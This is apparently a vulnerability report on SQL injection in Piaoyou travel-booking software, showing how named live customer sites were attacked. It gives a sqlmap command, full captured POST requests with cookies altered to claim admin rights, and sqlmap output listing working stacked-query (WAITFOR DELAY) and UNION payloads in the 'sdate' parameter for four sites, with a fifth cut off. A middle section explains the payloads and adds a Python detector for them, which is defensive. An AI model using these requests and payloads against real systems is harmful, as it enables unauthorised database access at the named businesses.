Keyword: 技术支持:盛代科技-票友软件 (technical support: Shengdai Technology - Piaoyou Software)
http://www.piaoyou.org/case_web.htm lists the customer sites running Piaoyou Software.
The affected page requires a login; registering an account first is enough.
sqlmap.py -r 1.txt --time-sec=10 -p sdate
Case 1: http://www.h-h.com.cn
POST injection:
POST /Financial/fksq_meb.aspx HTTP/1.1
Host: www.h-h.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.h-h.com.cn/Financial/fksq_meb.aspx
Cookie: ASP.NET_SessionId=j4mez4nqemur1p5awzc5vw1r; tktcookie=memberid=717&truename=qwueiuqwe&level=%e5%85%ac%e5%8f%b8%e5%ae%a2&yhzc=0&gjyhzc=0&yhfs=3&logo=&sh=0&bm=&username=Administrator&shgroup=admin&dbgroup=admin&flag=admin
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 3728

__VIEWSTATE=[base64 ViewState omitted]&__EVENTVALIDATION=%2FwEWCgK9%2FauVBgLN0o7ECAK7zY7ECALN78rvDALdgOABAsKA4AECu6mvywICjNWu7AwCmpSpJALSzZWdCeTSLOOzN%2Bp6XI9xcDsnWThoLwdkvHSo1F18f358pUJd&sdate=2015-6-15&edate=2015-6-15&sh=&serarch_but=%E6%9F%A5%E8%AF%A2&kfgp=&skid=0&memberid=717
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: sdate (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: __VIEWSTATE=[omitted]&__EVENTVALIDATION=/wEWCgK9/auVBgLN0o7ECAK7zY7ECALN78rvDALdgOABAsKA4AECu6mvywICjNWu7AwCmpSpJALSzZWdCeTSLOOzN+p6XI9xcDsnWThoLwdkvHSo1F18f358pUJd&sdate=2015-6-15');WAITFOR DELAY '0:0:5'--&edate=2015-6-15&sh=&serarch_but=%E6%9F%A5%E8%AF%A2&kfgp=&skid=0&memberid=717

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: __VIEWSTATE=[omitted]&__EVENTVALIDATION=/wEWCgK9/auVBgLN0o7ECAK7zY7ECALN78rvDALdgOABAsKA4AECu6mvywICjNWu7AwCmpSpJALSzZWdCeTSLOOzN+p6XI9xcDsnWThoLwdkvHSo1F18f358pUJd&sdate=2015-6-15') UNION ALL SELECT NULL,CHAR(113)+CHAR(118)+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(119)+CHAR(85)+CHAR(81)+CHAR(114)+CHAR(88)+CHAR(69)+CHAR(65)+CHAR(66)+CHAR(71)+CHAR(113)+CHAR(113)+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &edate=2015-6-15&sh=&serarch_but=%E6%9F%A5%E8%AF%A2&kfgp=&skid=0&memberid=717
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
Database: haihua_pek
[168 tables]
Case 2: http://www.4008836868.com/

POST /Financial/fksq_meb.aspx HTTP/1.1
Host: www.4008836868.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.4008836868.com/Financial/fksq_meb.aspx
Cookie: ASP.NET_SessionId=4tsndy41ilydo2ck4gem5ewy; tktcookie=memberid=3274&truename=asdaskdj&level=%e5%85%ac%e5%8f%b8%e5%ae%a2&yhzc=0&gjyhzc=0&yhfs=3&logo=&sh=0&bm=&username=Administrator&shgroup=admin&dbgroup=admin&flag=admin
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 3515

__VIEWSTATE=[base64 ViewState omitted]&__EVENTVALIDATION=%2FwEWCgKg%2Fa2kAQLN0o7ECAK7zY7ECALN78rvDALdgOABAsKA4AECu6mvywICjNWu7AwCmpSpJALSzZWdCXHNZ42f4qO60mvtrzDdYNphu0TTEXtyny8Gn6twQzgZ&sdate=2015-6-15&edate=2015-6-15&sh=&serarch_but=%E6%9F%A5%E8%AF%A2&kfgp=&skid=0&memberid=3274
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: sdate (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: __VIEWSTATE=[omitted]&__EVENTVALIDATION=/wEWCgKg/a2kAQLN0o7ECAK7zY7ECALN78rvDALdgOABAsKA4AECu6mvywICjNWu7AwCmpSpJALSzZWdCXHNZ42f4qO60mvtrzDdYNphu0TTEXtyny8Gn6twQzgZ&sdate=2015-6-15');WAITFOR DELAY '0:0:10'--&edate=2015-6-15&sh=&serarch_but=%E6%9F%A5%E8%AF%A2&kfgp=&skid=0&memberid=3274

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: __VIEWSTATE=[omitted]&__EVENTVALIDATION=/wEWCgKg/a2kAQLN0o7ECAK7zY7ECALN78rvDALdgOABAsKA4AECu6mvywICjNWu7AwCmpSpJALSzZWdCXHNZ42f4qO60mvtrzDdYNphu0TTEXtyny8Gn6twQzgZ&sdate=2015-6-15') UNION ALL SELECT NULL,NULL,NULL,CHAR(113)+CHAR(118)+CHAR(118)+CHAR(122)+CHAR(113)+CHAR(108)+CHAR(78)+CHAR(114)+CHAR(73)+CHAR(78)+CHAR(104)+CHAR(114)+CHAR(118)+CHAR(114)+CHAR(75)+CHAR(113)+CHAR(112)+CHAR(98)+CHAR(113)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &edate=2015-6-15&sh=&serarch_but=%E6%9F%A5%E8%AF%A2&kfgp=&skid=0&memberid=3274
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
current database: 'PiaoYou_james'
Case 3: http://travel.piaoyou.org
POST //Financial/fksq_meb.aspx HTTP/1.1
Host: travel.piaoyou.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://travel.piaoyou.org//Financial/fksq_meb.aspx
Cookie: ASP.NET_SessionId=gahoq4vgqy1up25s1exqex2m; tktcookie=memberid=36&truename=alksdlk&level=%e5%85%ac%e5%8f%b8%e5%ae%a2&yhzc=0&gjyhzc=0&yhfs=3&logo=&sh=0&bm=&username=Administrator&shgroup=admin&dbgroup=admin&flag=admin
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 3893

__VIEWSTATE=[base64 ViewState omitted]&__EVENTVALIDATION=%2FwEWCgKj1Jz9DQLN0o7ECAK7zY7ECALN78rvDALdgOABAsKA4AECu6mvywICjNWu7AwCmpSpJALSzZWdCbVztzxT1ROuhNWQV5yGReNW8vbQEp%2BKL8PsKAmeThYB&sdate=2015-6-15&edate=2015-6-15&sh=&serarch_but=%E6%9F%A5%E8%AF%A2&kfgp=&skid=0&memberid=36
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: sdate (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: __VIEWSTATE=[omitted]&__EVENTVALIDATION=/wEWCgKj1Jz9DQLN0o7ECAK7zY7ECALN78rvDALdgOABAsKA4AECu6mvywICjNWu7AwCmpSpJALSzZWdCbVztzxT1ROuhNWQV5yGReNW8vbQEp+KL8PsKAmeThYB&sdate=2015-6-15');WAITFOR DELAY '0:0:10'--&edate=2015-6-15&sh=&serarch_but=%E6%9F%A5%E8%AF%A2&kfgp=&skid=0&memberid=36

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: __VIEWSTATE=[omitted]&__EVENTVALIDATION=/wEWCgKj1Jz9DQLN0o7ECAK7zY7ECALN78rvDALdgOABAsKA4AECu6mvywICjNWu7AwCmpSpJALSzZWdCbVztzxT1ROuhNWQV5yGReNW8vbQEp+KL8PsKAmeThYB&sdate=2015-6-15') UNION ALL SELECT NULL,NULL,NULL,CHAR(113)+CHAR(112)+CHAR(107)+CHAR(113)+CHAR(113)+CHAR(84)+CHAR(79)+CHAR(88)+CHAR(74)+CHAR(83)+CHAR(113)+CHAR(85)+CHAR(99)+CHAR(105)+CHAR(108)+CHAR(113)+CHAR(120)+CHAR(120)+CHAR(122)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &edate=2015-6-15&sh=&serarch_but=%E6%9F%A5%E8%AF%A2&kfgp=&skid=0&memberid=36
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
current database: 'sdpiaoyou'
Case 4: http://ryxtrip.com/
POST /Financial/fksq_meb.aspx HTTP/1.1
Host: ryxtrip.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://ryxtrip.com/Financial/fksq_meb.aspx
Cookie: VERSION=2,0,0,0; BRIDGE_INVITE_0=0; BRIDGE_REFRESH=5000; BRIDGE_CLOCK=1434351705610; BRIDGE_NEED=1; baidu_qiao_v3_count_6031340=1; ASP.NET_SessionId=zbrl5miccffv3gmrupifsgn5; Hm_lvt_da5d85e35ea2fc856fd93df2a2962611=1434351655; Hm_lpvt_da5d85e35ea2fc856fd93df2a2962611=1434351699; tktcookie=memberid=7&truename=dkajsdkj&level=%e5%85%ac%e5%8f%b8%e5%ae%a2&yhzc=0&gjyhzc=0&yhfs=3&logo=&sh=0&bm=&username=Administrator&shgroup=admin&dbgroup=admin&flag=admin; BRIDGE_R6031340=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 3786

__VIEWSTATE=[base64 ViewState omitted] (the rest of this request is cut off in the source)
Q8PFgIfAAVI5LiK5rW35pel5pyI6KGM6Iiq56m656Wo5Yqh5pyN5Yqh5pyJ6ZmQ5YWs5Y%2B4ICAgICDmsqpJQ1DlpIcxMTA0Mjc2NOWPty0xZGQCAw8PFgIfAAUw5Zyw5Z2A77ya5LiK5rW35biC5aSn5rih5rKz6LevMTcxOOWPt0LluqdCNzA35a6kZGQCBQ8PFgIfAAU655S16K%2Bd77yaMDIxLTUxMDk2OTU5IDAyMS01MTA5NjEwMCAgIOS8oOecn%2B%2B8mjAyMS01MTA2MjA5MGRkAgcPFgIfAAVLPHNjcmlwdCB0eXBlPSd0ZXh0L2phdmFzY3JpcHQnPnNldEludGVydmFsKCdtZXNzYWdlX3R4KCknLCAzMDAwMCk7PC9zY3JpcHQ%2BZGQLlUfXjIPcz7cRnJLQ7WiqVS6Qk58FN7zSQNz%2B3gjT%2Bw%3D%3D&__EVENTVALIDATION=%2FwEWCgKI3oXRCgLN0o7ECAK7zY7ECALN78rvDALdgOABAsKA4AECu6mvywICjNWu7AwCmpSpJALSzZWdCb8RnfQLgjfBlqC5ElREBfhxqKy8PXOzPeQwVu%2F7scte&sdate=2015%2F6%2F15&edate=2015%2F6%2F15&sh=&serarch_but=%E6%9F%A5%E8%AF%A2&kfgp=&skid=0&memberid=7
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: sdate (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: __VIEWSTATE=/wEPDwUKMTE2MDQ5NzAwMQ9kFgICAw9kFgYCAQ9kFgwCAw8PFgIeBFRleHQFCGRrYWpzZGtqZGQCBQ8PFgIfAAUMMDIxLTUxMDk2OTU5ZGQCBw8WAh4HVmlzaWJsZWcWAgIBDw8WAh8ABQ1BZG1pbmlzdHJhdG9yZGQCCQ8PFgQeC05hdmlnYXRlVXJsBRR+L1N5c3RlbS9teWluZm8uYXNweB8ABQzmiJHnmoTkv6Hmga9kZAILDw8WBB8CBRJ+L21lbWJlci9leGl0LmFzcHgfAAUM5a6J5YWo6YCA5Ye6ZGQCDQ8WAh8ABaAPPGxpPjxhIGhyZWY9IiMiPuezu+e7n+euoeeQhjwvYT48aSBjbGFzcz0iaWNvMDMiPjwvaT48dWwgY2xhc3M9InN1Yi1uYXYiPjxsaT48YSBocmVmPSIvU3lzdGVtL215aW5mby5hc3B4Ij7CtyDkvIHkuJrkv6Hmga88L2E+PC9saT48bGk+PGEgaHJlZj0iL21lbWJlci9Hcm91cC5hc3B4Ij7CtyDpg6jpl6jliIbnu4Q8L2E+PC9saT48bGk+PGEgaHJlZj0iL21lbWJlci9GbGFnLmFzcHgiPsK3IOinkuiJsuadg+mZkDwvYT48L2xpPjxsaT48YSBocmVmPSIvbWVtYmVyL1BlcnNvbm5lbC5hc3B4Ij7CtyDlkZjlt6XnrqHnkIY8L2E+PC9saT48L3VsPjwvbGk+PGxpPjxhIGhyZWY9IiMiPuW3ruaXhemihOWumjwvYT48aSBjbGFzcz0iaWNvMDIiPjwvaT48dWwgY2xhc3M9InN1Yi1uYXYiPjxsaT48YSBocmVmPSIvRmxpZ2h0LyI+wrcg5Zu95YaF5py656WoPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9GbGlnaHRfaW50LyI+wrcg5Zu96ZmF5py656WoPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9Ib3RlbC8iPsK3IOWbveWGhemFkuW6lzwvYT48L2xpPjxsaT48YSBocmVmPSIvVHJhaW4vIj7CtyDngavovabnpag8L2E+PC9saT48L3VsPjwvbGk+PGxpPjxhIGhyZWY9IiMiPuiuouWNleafpeivojwvYT48aSBjbGFzcz0iaWNvMDQiPjwvaT48dWwgY2xhc3M9InN1Yi1uYXYiPjxsaT48YSBocmVmPSIvT3JkZXIvZmxpZ2h0LmFzcHgiPsK3IOmjnuacuuelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvT3JkZXIvaG90ZWwuYXNweCI+wrcg5Zu95YaF6YWS5bqXPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9PcmRlci90cmFpbi5hc3B4Ij7CtyDngavovabnpag8L2E+PC9saT48bGk+PGEgaHJlZj0iL09yZGVyL1JldHVybi5hc3B4Ij7CtyDpgIDnpajorrDlvZU8L2E+PC9saT48bGk+PGEgaHJlZj0iL09yZGVyL3NjZ3FfbGlzdC5hc3B4Ij7CtyDljYfoiLHmlLnmnJ/orrDlvZU8L2E+PC9saT48L3VsPjwvbGk+PGxpPjxhIGhyZWY9IiMiPuiuouWNleWuoeaguDwvYT48aSBjbGFzcz0iaWNvMDUiPjwvaT48dWwgY2xhc3M9InN1Yi1uYXYiPjxsaT48YSBocmVmPSIvQ2hlY2svZmxpZ2h0LmFzcHgiPsK3IOmjnuacuuelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvQ2hlY2svaG90ZWwuYXNweCI+wrcg5Zu95YaF6YWS5bqXPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9DaGVjay90cmFpbi5hc3B4Ij7CtyDngavovabnpag8L2E+PC9saT48L3VsPjwvbGk+PGxpPjxhIGhyZWY9IiMiPuW3ruaXheaKpeihqDwvYT48aSBjbGFzcz0iaWNvMDYiPjwvaT48dWwgY2xhc3M9InN1Yi1uYXYiPjxsaT48YSBocmVmPSIvUmVwb3J0L2ZsaWdodC5hc3B4Ij7CtyDpo57mnLrnpag8L2E+PC9saT48bGk+PGEgaHJlZj0iL1JlcG9ydC90cmFpbi5hc3B4Ij7CtyDngavovabnpag8L2E+PC9saT48bGk+PGEgaHJlZj0iL1JlcG9ydC9ob3RlbC5hc3B4Ij7CtyDlm73lhoXphZLlupc8L2E+PC9saT48bGk+PGEgaHJlZj0iL1JlcG9ydC92aXNhLmFzcHgiPsK3IOetvuivgTwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L2J4LmFzcHgiPsK3IOS/nemZqTwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L290aGVyLmFzcHgiPsK3IOWFtuWugzwvYT48L2xpPjwvdWw+PC9saT48bGk+PGEgaHJlZj0iIyI+6LSi5Yqh566h55CGPC9hPjxpIGNsYXNzPSJpY28wNyI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9GaW5hbmNpYWwvZmtzcV9tZWIuYXNweCI+wrcg5LuY5qy+55Sz6K+36K6w5b2VPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9GaW5hbmNpYWwvcGF5X2hpc3RvcnkuYXNweCI+wrcg5bey5LuY5qy+6K6w5b2VPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9GaW5hbmNpYWwvb3JkZXJzX2FsbC5hc3B4Ij7CtyDnu7zlkIjnu5/orqE8L2E+PC9saT48bGk+PGEgaHJlZj0iL0ZpbmFuY2lhbC94Y2Rfb3JkZXJzLmFzcHgiPsK3IOihjOeoi+WNleS6pOaOpTwvYT48L2xpPjwvdWw+PC9saT5kAgsPFgIeC18hSXRlbUNvdW50ZmQCDQ9kFggCAQ8PFgIfAAVI5LiK5rW35pel5pyI6KGM6Iiq56m656Wo5Yqh5pyN5Yqh5pyJ6ZmQ5YWs5Y+4ICAgICDmsqpJQ1DlpIcxMTA0Mjc2NOWPty0xZGQCAw8PFgIfAAUw5Zyw5Z2A77ya5LiK5rW35biC5aSn5rih5rKz6LevMTcxOOWPt0LluqdCNzA35a6kZGQCBQ8PFgIfAAU655S16K+d77yaMDIxLTUxMDk2OTU5IDAyMS01MTA5NjEwMCAgIOS8oOecn++8mjAyMS01MTA2MjA5MGRkAgcPFgIfAAVLPHNjcmlwdCB0eXBlPSd0ZXh0L2phdmFzY3JpcHQnPnNldEludGVydmFsKCdtZXNzYWdlX3R4KCknLCAzMDAwMCk7PC9zY3JpcHQ+ZGQLlUfXjIPcz7cRnJLQ7WiqVS6Qk58FN7zSQNz+3gjT+w==&__EVENTVALIDATION=/wEWCgKI3oXRCgLN0o7ECAK7zY7ECALN78rvDALdgOABAsKA4AECu6mvywICjNWu7AwCmpSpJALSzZWdCb8RnfQLgjfBlqC5ElREBfhxqKy8PXOzPeQwVu/7scte&sdate=2015/6/15');WAITFOR DELAY '0:0:10'--&edate=2015/6/15&sh=&serarch_but=%E6%9F%A5%E8%AF%A2&kfgp=&skid=0&memberid=7

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: __VIEWSTATE=...&__EVENTVALIDATION=/wEWCgKI3oXRCgLN0o7ECAK7zY7ECALN78rvDALdgOABAsKA4AECu6mvywICjNWu7AwCmpSpJALSzZWdCb8RnfQLgjfBlqC5ElREBfhxqKy8PXOzPeQwVu/7scte&sdate=2015/6/15') UNION ALL SELECT NULL,NULL,NULL,CHAR(113)+CHAR(120)+CHAR(120)+CHAR(106)+CHAR(113)+CHAR(70)+CHAR(68)+CHAR(78)+CHAR(110)+CHAR(77)+CHAR(115)+CHAR(112)+CHAR(90)+CHAR(104)+CHAR(75)+CHAR(113)+CHAR(118)+CHAR(106)+CHAR(106)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &edate=2015/6/15&sh=&serarch_but=%E6%9F%A5%E8%AF%A2&kfgp=&skid=0&memberid=7
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
current database: 'ryx_sha'
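Two things in the sqlmap output above are worth reading closely. The stacked-queries payload closes a quoted literal and a parenthesis (`')`) before appending `;WAITFOR DELAY '0:0:10'--`, which shows that `sdate` is concatenated into T-SQL inside a quoted, parenthesised expression and that the server lets a second statement run; the 10-second delay is the `--time-sec=10` from the sqlmap command at the top of the page, so confirmation rests on comparing response time against a baseline. The UNION payload with eleven `NULL`s means the original SELECT returns eleven columns, and the `CHAR(113)+...` string is sqlmap's marker for spotting which column is reflected in the page. The following Python is an added example, not part of the original report and not the vendor's code: a small detector that pulls `sdate` out of urlencoded ASP.NET form bodies (as captured by a proxy or WAF) and flags both payload families. The bodies are constructed; the real `__VIEWSTATE` and `__EVENTVALIDATION` values are replaced with placeholders.

```python
"""Flag the two sdate payload families sqlmap reported against
/Financial/fksq_meb.aspx (a stacked WAITFOR DELAY and a UNION ALL SELECT
with CHAR() markers) in urlencoded form bodies. Added example; the sample
bodies are constructed and the ViewState fields are placeholders."""
import re
from urllib.parse import parse_qs, urlencode

# Detection rules, applied to the percent-decoded parameter value.
# ';WAITFOR DELAY' is MSSQL-specific; the "')" close reflects the
# quoted-and-parenthesised context visible in the sqlmap payloads.
RULES = {
    "stacked-waitfor":   re.compile(r";\s*WAITFOR\s+DELAY\s+'[\d:]+'", re.I),
    "union-select":      re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
    "char-concat":       re.compile(r"(?:CHAR\(\d+\)\+){3,}", re.I),
    "quote-paren-break": re.compile(r"'\)"),
    "comment-tail":      re.compile(r"--\s*$"),
}


def extract_param(body: str, name: str) -> str:
    """First value of `name` from a urlencoded POST body, already decoded."""
    return parse_qs(body, keep_blank_values=True).get(name, [""])[0]


def classify(value: str) -> list:
    """Names of every rule the decoded value matches ([] for a plain date)."""
    return [tag for tag, rx in RULES.items() if rx.search(value)]


def scan_bodies(bodies, param: str = "sdate"):
    """Return (index, decoded value, tags) for each body whose `param` is flagged."""
    hits = []
    for i, body in enumerate(bodies):
        value = extract_param(body, param)
        tags = classify(value)
        if tags:
            hits.append((i, value, tags))
    return hits


# Constructed fixed fields mirroring the captured request's field names.
# The ViewState blobs are placeholders, not the values from the report.
_FIXED = {
    "__VIEWSTATE": "VIEWSTATE_PLACEHOLDER",
    "__EVENTVALIDATION": "EVENTVALIDATION_PLACEHOLDER",
    "edate": "2015/6/15", "sh": "", "serarch_but": "查询",
    "kfgp": "", "skid": "0", "memberid": "7",
}


def body_with(sdate: str) -> str:
    """Build a urlencoded body; urlencode percent-encodes ' + ; / like a browser."""
    return urlencode({"sdate": sdate, **_FIXED})


# Constructed samples: the benign date and the two payload shapes quoted above
# (UNION marker shortened to five CHAR() terms).
UNION_MARKER = "+".join(f"CHAR({c})" for c in (113, 120, 120, 106, 113))
SAMPLE_BODIES = [
    body_with("2015/6/15"),
    body_with("2015/6/15');WAITFOR DELAY '0:0:10'--"),
    body_with("2015/6/15') UNION ALL SELECT NULL,NULL,NULL," + UNION_MARKER
              + ",NULL,NULL,NULL,NULL,NULL,NULL,NULL-- "),
]

if __name__ == "__main__":
    for idx, value, tags in scan_bodies(SAMPLE_BODIES):
        print(f"body[{idx}] sdate={value!r} -> {tags}")
```

Match on the decoded value, not the raw body: sqlmap percent-encodes `'`, `+` and `;`, so a rule run over the raw bytes misses `CHAR(113)%2BCHAR(120)`. IIS does not log POST bodies by default, so this kind of check needs a proxy, WAF or request-logging module in front of the application.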
Case 5: http://hhcl.h-h.com.cn/
<code>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: sdate (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: __VIEWSTATE=...&__EVENTVALIDATION=/wEWCgL176S6AgLN0o7ECAK7zY7ECALN78rvDALdgOABAsKA4AECu6mvywICjNWu7A